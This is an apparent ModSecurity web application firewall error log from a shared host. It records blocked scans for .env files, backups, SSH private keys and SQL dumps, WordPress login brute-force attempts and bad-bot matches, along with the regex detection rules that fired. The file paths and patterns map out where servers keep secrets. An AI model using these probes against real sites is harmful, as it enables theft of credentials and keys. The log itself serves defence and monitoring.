[Tue May 26 14:54:17.012785 2026] [security2:error] [pid 662057:tid 662309] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmwPT3lMm9tGFVg9RL5QAAAYQ"]
[Tue May 26 14:54:18.422296 2026] [security2:error] [pid 658374:tid 658626] [client 203.83.11.13:60572] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "www.haddingtonwines.com"] [uri "/"] [unique_id "ahVmwp1Mb7_aby-E0KcufgAAAHo"]
[Tue May 26 14:54:19.170727 2026] [security2:error] [pid 662057:tid 662208] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmwvT3lMm9tGFVg9RL-AAAAR8"]
[Tue May 26 14:54:19.675876 2026] [security2:error] [pid 658374:tid 658563] [client 74.249.173.207:4609] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.eco-green.com.mx"] [uri "/ws.php"] [unique_id "ahVmw51Mb7_aby-E0KcungAAADs"]
[Tue May 26 14:54:21.430504 2026] [security2:error] [pid 658374:tid 658530] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmxZ1Mb7_aby-E0KcuwAAAABo"]
[Tue May 26 14:54:22.084338 2026] [security2:error] [pid 658374:tid 658416] [remote 45.79.189.31:38280] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.189.79.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahVmxZ1Mb7_aby-E0Kcu1AAAPSk"]
[Tue May 26 14:54:22.800320 2026] [security2:error] [pid 662057:tid 662275] [client 185.191.171.8:24230] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVmxvT3lMm9tGFVg9RMHwAAAWI"]
[Tue May 26 14:54:22.800476 2026] [security2:error] [pid 662057:tid 662275] [client 185.191.171.8:24230] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVmxvT3lMm9tGFVg9RMHwAAAWI"]
[Tue May 26 14:54:22.966224 2026] [security2:error] [pid 658374:tid 658522] [client 5.255.115.88:42414] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.aastha-enterprises.com"] [uri "/app/.env"] [unique_id "ahVmxp1Mb7_aby-E0Kcu5wAAABI"]
[Tue May 26 14:54:22.967229 2026] [security2:error] [pid 658374:tid 658544] [client 5.255.115.88:42352] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.aastha-enterprises.com"] [uri "/.env.backup"] [unique_id "ahVmxp1Mb7_aby-E0Kcu6wAAACg"]
[Tue May 26 14:54:22.986145 2026] [security2:error] [pid 662057:tid 662187] [client 5.255.115.88:42428] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.aastha-enterprises.com"] [uri "/public/.env"] [unique_id "ahVmxvT3lMm9tGFVg9RMKQAAAQo"]
[Tue May 26 14:54:23.010825 2026] [security2:error] [pid 662057:tid 662248] [client 5.255.115.88:42374] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.aastha-enterprises.com"] [uri "/.env.old"] [unique_id "ahVmx_T3lMm9tGFVg9RMLwAAAUc"]
[Tue May 26 14:54:23.013011 2026] [security2:error] [pid 662057:tid 662212] [client 5.255.115.88:42368] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.aastha-enterprises.com"] [uri "/.env.bak"] [unique_id "ahVmx_T3lMm9tGFVg9RMMwAAASM"]
[Tue May 26 14:54:23.013408 2026] [security2:error] [pid 662057:tid 662291] [client 5.255.115.88:42404] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.aastha-enterprises.com"] [uri "/backend/.env"] [unique_id "ahVmx_T3lMm9tGFVg9RMNwAAAXI"]
[Tue May 26 14:54:23.014054 2026] [security2:error] [pid 662057:tid 662257] [client 5.255.115.88:42392] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.aastha-enterprises.com"] [uri "/api/.env"] [unique_id "ahVmx_T3lMm9tGFVg9RMOQAAAVA"]
[Tue May 26 14:54:23.028575 2026] [security2:error] [pid 658374:tid 658588] [client 5.255.115.88:42438] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "www.aastha-enterprises.com"] [uri "/.ssh/id_rsa"] [unique_id "ahVmx51Mb7_aby-E0KcvDAAAAFQ"]
[Tue May 26 14:54:23.722446 2026] [security2:error] [pid 662057:tid 662207] [client 5.255.115.88:42234] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.aastha-enterprises.com"] [uri "/.env"] [unique_id "ahVmx_T3lMm9tGFVg9RMSgAAAR4"]
[Tue May 26 14:54:23.745807 2026] [security2:error] [pid 658374:tid 658565] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmx51Mb7_aby-E0KcvEQAAAD0"]
[Tue May 26 14:54:24.261236 2026] [security2:error] [pid 662057:tid 662302] [client 5.255.115.88:42452] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "www.aastha-enterprises.com"] [uri "/.ssh/id_dsa"] [unique_id "ahVmyPT3lMm9tGFVg9RMVAAAAX0"]
[Tue May 26 14:54:25.960844 2026] [security2:error] [pid 658374:tid 658603] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmyZ1Mb7_aby-E0KcvUAAAAGM"]
[Tue May 26 14:54:28.445551 2026] [security2:error] [pid 658374:tid 658604] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmy51Mb7_aby-E0KcvjAAAAGQ"]
[Tue May 26 14:54:28.675461 2026] [security2:error] [pid 662057:tid 662224] [client 14.165.33.231:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmzPT3lMm9tGFVg9RMkgAAAS8"]
[Tue May 26 14:54:29.817506 2026] [security2:error] [pid 658374:tid 658395] [remote 95.216.117.13:45472] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-login.php"] [unique_id "ahVmzZ1Mb7_aby-E0KcvrgAAShQ"]
[Tue May 26 14:54:30.444532 2026] [security2:error] [pid 658374:tid 658596] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmzp1Mb7_aby-E0KcvtwAAAFw"]
[Tue May 26 14:54:31.303977 2026] [security2:error] [pid 662057:tid 662170] [remote 95.216.117.13:45482] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahVmz_T3lMm9tGFVg9RMqAABeHA"]
[Tue May 26 14:54:31.377790 2026] [security2:error] [pid 662057:tid 662303] [client 74.249.173.207:4616] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.eco-green.com.mx"] [uri "/404.php"] [unique_id "ahVmz_T3lMm9tGFVg9RMqwAAAX4"]
[Tue May 26 14:54:33.017861 2026] [security2:error] [pid 662057:tid 662225] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVm0PT3lMm9tGFVg9RMwgAAATA"]
[Tue May 26 14:54:34.001822 2026] [security2:error] [pid 662057:tid 662252] [client 176.65.139.234:24988] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "proxuber.com"] [uri "/.env"] [unique_id "ahVm0vT3lMm9tGFVg9RM4gAAAUs"]
[Tue May 26 14:54:34.146256 2026] [security2:error] [pid 662057:tid 662283] [client 176.65.139.235:32810] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.test.glorodrc.com"] [uri "/.env"] [unique_id "ahVm0vT3lMm9tGFVg9RM5gAAAWo"]
[Tue May 26 14:54:34.191679 2026] [security2:error] [pid 662057:tid 662262] [client 176.65.139.231:25212] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.zeexo.glorodrc.com"] [uri "/.env"] [unique_id "ahVm0vT3lMm9tGFVg9RM5wAAAVU"]
[Tue May 26 14:54:34.198699 2026] [security2:error] [pid 658374:tid 658553] [client 176.65.139.231:25226] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.proxuber.glorodavionics.com"] [uri "/.env"] [unique_id "ahVm0p1Mb7_aby-E0KcwEAAAADE"]
[Tue May 26 14:54:34.388740 2026] [security2:error] [pid 662057:tid 662212] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVm0fT3lMm9tGFVg9RM4QAAASM"]
[Tue May 26 14:54:35.862670 2026] [security2:error] [pid 658374:tid 658591] [client 74.7.244.38:48336] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "toronto121mortgage.com"] [uri "/cgi-sys/404.html"] [unique_id "ahVm051Mb7_aby-E0KcwRgAAVx8"]
[Tue May 26 14:54:36.171841 2026] [security2:error] [pid 662057:tid 662154] [remote 14.161.17.36:36068] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.17.161.14.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahVm0_T3lMm9tGFVg9RNFQABWmA"]
[Tue May 26 14:54:36.568457 2026] [security2:error] [pid 662057:tid 662233] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVm1PT3lMm9tGFVg9RNGgAAATg"]
[Tue May 26 14:54:38.207232 2026] [security2:error] [pid 658374:tid 658490] [remote 5.78.119.122:42848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 122.119.78.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahVm1p1Mb7_aby-E0KcwhAAAXnM"]
[Tue May 26 14:54:38.813652 2026] [security2:error] [pid 662057:tid 662192] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVm1vT3lMm9tGFVg9RNRAAAAQ8"]
[Tue May 26 14:54:41.883404 2026] [security2:error] [pid 658374:tid 658543] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVm2Z1Mb7_aby-E0KcwzQAAACc"]
[Tue May 26 14:54:43.889119 2026] [security2:error] [pid 662057:tid 662304] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVm2_T3lMm9tGFVg9RNdwAAAX8"]
[Tue May 26 14:54:44.736047 2026] [security2:error] [pid 662057:tid 662129] [remote 37.187.156.42:57384] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.156.187.37.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahVm3PT3lMm9tGFVg9RNfAABFUc"]
[Tue May 26 14:54:46.149367 2026] [security2:error] [pid 662057:tid 662289] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVm3fT3lMm9tGFVg9RNpgAAAXA"]
[Tue May 26 14:54:48.496769 2026] [security2:error] [pid 658374:tid 658565] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVm4J1Mb7_aby-E0KcxbgAAAD0"]
[Tue May 26 14:54:51.212252 2026] [security2:error] [pid 658374:tid 658630] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVm4p1Mb7_aby-E0KcxvwAAAH4"]
[Tue May 26 14:54:51.794498 2026] [security2:error] [pid 658374:tid 658621] [client 74.7.244.38:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.bloggertarget.com"] [uri "/robots.txt"] [unique_id "ahVm451Mb7_aby-E0Kcx1AAAAHU"]
[Tue May 26 14:54:51.795366 2026] [security2:error] [pid 658374:tid 658521] [client 74.7.244.38:37668] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.bloggertarget.com"] [uri "/robots.txt"] [unique_id "ahVm451Mb7_aby-E0Kcx0gAAEWk"]
[Tue May 26 14:54:53.012163 2026] [security2:error] [pid 662057:tid 662309] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVm5PT3lMm9tGFVg9RN9wAAAYQ"]
[Tue May 26 14:54:55.088522 2026] [security2:error] [pid 658374:tid 658399] [remote 82.196.25.136:36110] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 136.25.196.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVm5p1Mb7_aby-E0KcyGgAAKBg"]
[Tue May 26 14:54:55.215713 2026] [security2:error] [pid 658374:tid 658617] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVm5p1Mb7_aby-E0KcyFQAAAHE"]
[Tue May 26 14:54:55.277359 2026] [security2:error] [pid 658374:tid 658533] [client 154.161.32.97:57066] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVm551Mb7_aby-E0KcyGwAAAB0"]
[Tue May 26 14:54:55.277506 2026] [security2:error] [pid 658374:tid 658533] [client 154.161.32.97:57066] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVm551Mb7_aby-E0KcyGwAAAB0"]
[Tue May 26 14:54:55.953444 2026] [security2:error] [pid 662057:tid 662224] [client 85.208.96.200:42092] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/shop-2/lookbook-carousel/"] [unique_id "ahVm5_T3lMm9tGFVg9ROKAAAAS8"]
[Tue May 26 14:54:55.953601 2026] [security2:error] [pid 662057:tid 662224] [client 85.208.96.200:42092] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.anujtradingco.com"] [uri "/shop-2/lookbook-carousel/"] [unique_id "ahVm5_T3lMm9tGFVg9ROKAAAAS8"]
[Tue May 26 14:54:57.553620 2026] [security2:error] [pid 662057:tid 662192] [client 123.19.91.181:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVm6fT3lMm9tGFVg9RONAAAAQ8"]
[Tue May 26 14:54:57.644822 2026] [security2:error] [pid 658374:tid 658586] [client 45.148.10.5:43488] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com.onesoft.in"] [uri "/database.sql"] [unique_id "ahVm6Z1Mb7_aby-E0KcyTgAAAFI"]
[Tue May 26 14:54:57.788709 2026] [security2:error] [pid 658374:tid 658560] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVm6Z1Mb7_aby-E0KcySgAAADg"]
[Tue May 26 14:54:58.457429 2026] [security2:error] [pid 662057:tid 662191] [client 154.161.32.97:57068] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVm6vT3lMm9tGFVg9ROPAAAAQ4"]
